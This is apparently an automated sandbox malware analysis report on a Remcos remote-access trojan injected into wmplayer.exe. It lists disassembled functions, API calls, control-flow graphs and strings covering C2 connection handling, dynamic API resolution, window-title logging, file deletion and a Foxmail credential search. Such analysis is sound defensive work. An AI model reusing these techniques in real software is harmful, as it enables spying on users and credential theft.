                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Program Files (x86)\Windows Media Player\wmplayer.exe,00000104), ref: 0040D790
                                                                                              • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                            • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Program Files (x86)\Windows Media Player\wmplayer.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-MKYDDH$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                            • API String ID: 2830904901-420791318
                                                                                            • Opcode ID: 5d7b8b9e03e273b64e8f372163362180627e7252eeeaa846a87e68f68c2bfc81
                                                                                            • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                            • Opcode Fuzzy Hash: 5d7b8b9e03e273b64e8f372163362180627e7252eeeaa846a87e68f68c2bfc81
                                                                                            • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
                                                                                            Function 00413FD4 Relevance: 51.6, APIs: 5, Strings: 24, Instructions: 813sleepnetworkCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 494 413fd4-41401f call 401faa call 41aa73 call 401faa call 401d64 call 401e8f call 43a5e7 507 414021-414028 Sleep 494->507 508 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afc3 call 404262 call 401d64 call 40b125 494->508 507->508 523 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afc3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 508->523 524 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 508->524 577 41419a-4141a1 523->577 578 41418c-414198 523->578 524->523 579 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 577->579 578->579 606 414244-41428a WSAGetLastError call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 579->606 607 41428f-41429d call 4041f1 579->607 629 414b54-414b66 call 4047eb call 4020b4 606->629 612 4142ca-4142df call 404915 call 40428c 607->612 613 41429f-4142c5 call 401f66 * 2 call 41a686 607->613 628 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 4 call 41a96d call 413683 call 4082dc call 440c51 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 612->628 612->629 613->629 694 414434-414441 call 40541d 628->694 695 414446-41446d call 401e8f call 412513 628->695 643 414b68-414b88 call 401d64 call 401e8f call 43a5e7 Sleep 629->643 644 414b8e-414b96 call 401d8c 629->644 643->644 644->523 694->695 701 414474-414abb call 403b40 call 40cbf1 call 41adee call 41aec8 call 41ad46 call 401d64 GetTickCount call 41ad46 call 41aca0 call 41ad46 * 2 call 41ac52 call 41aec8 * 5 call 40e679 call 41aec8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 695->701 702 41446f-414471 695->702 947 414ac0-414ac7 701->947 702->701 948 414ac9-414ad0 947->948 949 414adb-414ae2 947->949 948->949 950 414ad2-414ad4 948->950 951 414ae4-414ae9 call 40a767 949->951 952 414aee-414b20 call 405415 call 401f66 * 2 call 41a686 949->952 950->949 951->952 963 414b22-414b2e CreateThread 952->963 964 414b34-414b4f call 401eea * 2 call 401e13 952->964 963->964 964->629
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                            • WSAGetLastError.WS2_32 ref: 00414249
                                                                                            • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep$ErrorLastLocalTime
                                                                                            • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Program Files (x86)\Windows Media Player\wmplayer.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-MKYDDH$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                            • API String ID: 524882891-4208741794
                                                                                            • Opcode ID: 4d9d63c375b04e0ab183b302961c5789bacc940e7ede69b30a37692d4a1764dd
                                                                                            • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                                            • Opcode Fuzzy Hash: 4d9d63c375b04e0ab183b302961c5789bacc940e7ede69b30a37692d4a1764dd
                                                                                            • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D
                                                                                            Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 971 411c81-411cca GetModuleFileNameW call 401faa * 3 978 411ccc-411d56 call 41ab38 call 401e8f call 40c854 call 401eea call 41ab38 call 401e8f call 40c854 call 401eea call 41ab38 call 401e8f call 40c854 call 401eea 971->978 1003 411d58-411de8 call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 978->1003 1026 411df8 1003->1026 1027 411dea-411df2 Sleep 1003->1027 1028 411dfa-411e8a call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1026->1028 1027->1003 1027->1026 1051 411e9a 1028->1051 1052 411e8c-411e94 Sleep 1028->1052 1053 411e9c-411f2c call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1051->1053 1052->1028 1052->1051 1076 411f3c-411f60 1053->1076 1077 411f2e-411f36 Sleep 1053->1077 1078 411f64-411f80 call 401e07 call 41b61a 1076->1078 1077->1053 1077->1076 1083 411f82-411f91 call 401e07 DeleteFileW 1078->1083 1084 411f97-411fb3 call 401e07 call 41b61a 1078->1084 1083->1084 1091 411fd0 1084->1091 1092 411fb5-411fce call 401e07 DeleteFileW 1084->1092 1094 411fd4-411ff0 call 401e07 call 41b61a 1091->1094 1092->1094 1100 411ff2-412004 call 401e07 DeleteFileW 1094->1100 1101 41200a-41200c 1094->1101 1100->1101 1103 412019-412024 Sleep 1101->1103 1104 41200e-412010 1101->1104 1103->1078 1107 41202a-41203c call 408339 1103->1107 1104->1103 1106 412012-412017 1104->1106 1106->1103 1106->1107 1110 412092-4120b1 call 401e13 * 3 1107->1110 1111 41203e-41204c call 408339 1107->1111 1123 4120b6-41211f call 40b027 call 401e07 call 401fbd call 4123f7 call 401e13 call 405422 1110->1123 1111->1110 1117 41204e-41205c call 408339 1111->1117 1117->1110 1122 41205e-41208a Sleep call 401e13 * 3 1117->1122 1122->978 1137 412090 1122->1137 1143 412125-41226f call 41aec8 call 41ad46 call 4027ec call 4027cb * 6 call 40275c call 4027cb call 40275c call 404468 call 401eea * 10 1123->1143 1144 412274-41231b call 41aec8 call 4027ec call 4027cb * 6 call 40275c call 404468 1123->1144 1137->1123 1213 41236f-4123e7 call 401eea call 401e13 call 401eea * 9 1143->1213 1184 412320-41236b call 401eea * 7 1144->1184 1184->1213 1247 4123ec-4123f6 1213->1247
                                                                                            APIs
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                            • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                            • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                            • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                            • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                            • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                            • String ID: /stext "$HDG$HDG$>G$>G
                                                                                            • API String ID: 1223786279-3931108886
                                                                                            • Opcode ID: fdcd57630078c49f8af3691b533906fc9683ec26e64b3a272ca4ebf66d4a0bb2
                                                                                            • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                            • Opcode Fuzzy Hash: fdcd57630078c49f8af3691b533906fc9683ec26e64b3a272ca4ebf66d4a0bb2
                                                                                            • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                                            Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                              • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                              • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                              • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                              • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                            • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                            • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                            • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                            • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                            • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                            • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                            • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                            • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                            • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                            • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                            • String ID: )$Foxmail$ProgramFiles
                                                                                            • API String ID: 672098462-2938083778
                                                                                            • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                            • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                            • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                            • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                                                                            Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                              • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                              • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                              • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                              • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                            • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                            • API String ID: 3795512280-3163867910
                                                                                            • Opcode ID: 818c0fbae65db6fbdb4038cf918319d44e9dc5580a32f3981b56ddde7f909d0a
                                                                                            • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                            • Opcode Fuzzy Hash: 818c0fbae65db6fbdb4038cf918319d44e9dc5580a32f3981b56ddde7f909d0a
                                                                                            • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                                                            Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1384 40428c-4042ad connect 1385 4043e1-4043e5 1384->1385 1386 4042b3-4042b6 1384->1386 1389 4043e7-4043f5 WSAGetLastError 1385->1389 1390 40445f 1385->1390 1387 4043da-4043dc 1386->1387 1388 4042bc-4042bf 1386->1388 1391 404461-404465 1387->1391 1392 4042c1-4042e8 call 404cbf call 401f66 call 41a686 1388->1392 1393 4042eb-4042f5 call 420151 1388->1393 1389->1390 1394 4043f7-4043fa 1389->1394 1390->1391 1392->1393 1404 404306-404313 call 420373 1393->1404 1405 4042f7-404301 1393->1405 1397 404439-40443e 1394->1397 1398 4043fc-404437 call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 1394->1398 1400 404443-40445c call 401f66 * 2 call 41a686 1397->1400 1398->1390 1400->1390 1418 404315-404338 call 401f66 * 2 call 41a686 1404->1418 1419 40434c-404357 call 420f34 1404->1419 1405->1400 1445 40433b-404347 call 420191 1418->1445 1430 404389-404396 call 4202ea 1419->1430 1431 404359-404387 call 401f66 * 2 call 41a686 call 420592 1419->1431 1441 404398-4043bb call 401f66 * 2 call 41a686 1430->1441 1442 4043be-4043d7 CreateEventW * 2 1430->1442 1431->1445 1441->1442 1442->1387 1445->1390
                                                                                            APIs
                                                                                            • connect.WS2_32(?,00D8BAC8,00000010), ref: 004042A5
                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                            • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                            • API String ID: 994465650-2151626615
                                                                                            • Opcode ID: 4bca7d416cb3b09075a25b85a3234a820d3ab4dd462292ab93703bc931394468
                                                                                            • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                            • Opcode Fuzzy Hash: 4bca7d416cb3b09075a25b85a3234a820d3ab4dd462292ab93703bc931394468
                                                                                            • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                                                            Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                            • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                            • String ID:
                                                                                            • API String ID: 3658366068-0
                                                                                            • Opcode ID: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                            • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                            • Opcode Fuzzy Hash: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                            • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48
                                                                                            Function 0040A3F4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 158sleepCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                            • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                            • GetForegroundWindow.USER32 ref: 0040A467
                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                            • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                            • String ID: [${ User has been idle for $ minutes }$]
                                                                                            • API String ID: 911427763-3954389425
                                                                                            • Opcode ID: 40dc83a074cb538ad83ecf649c27d5a724cb82695593143808d24998f610649e
                                                                                            • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                            • Opcode Fuzzy Hash: 40dc83a074cb538ad83ecf649c27d5a724cb82695593143808d24998f610649e
                                                                                            • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                                                            Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
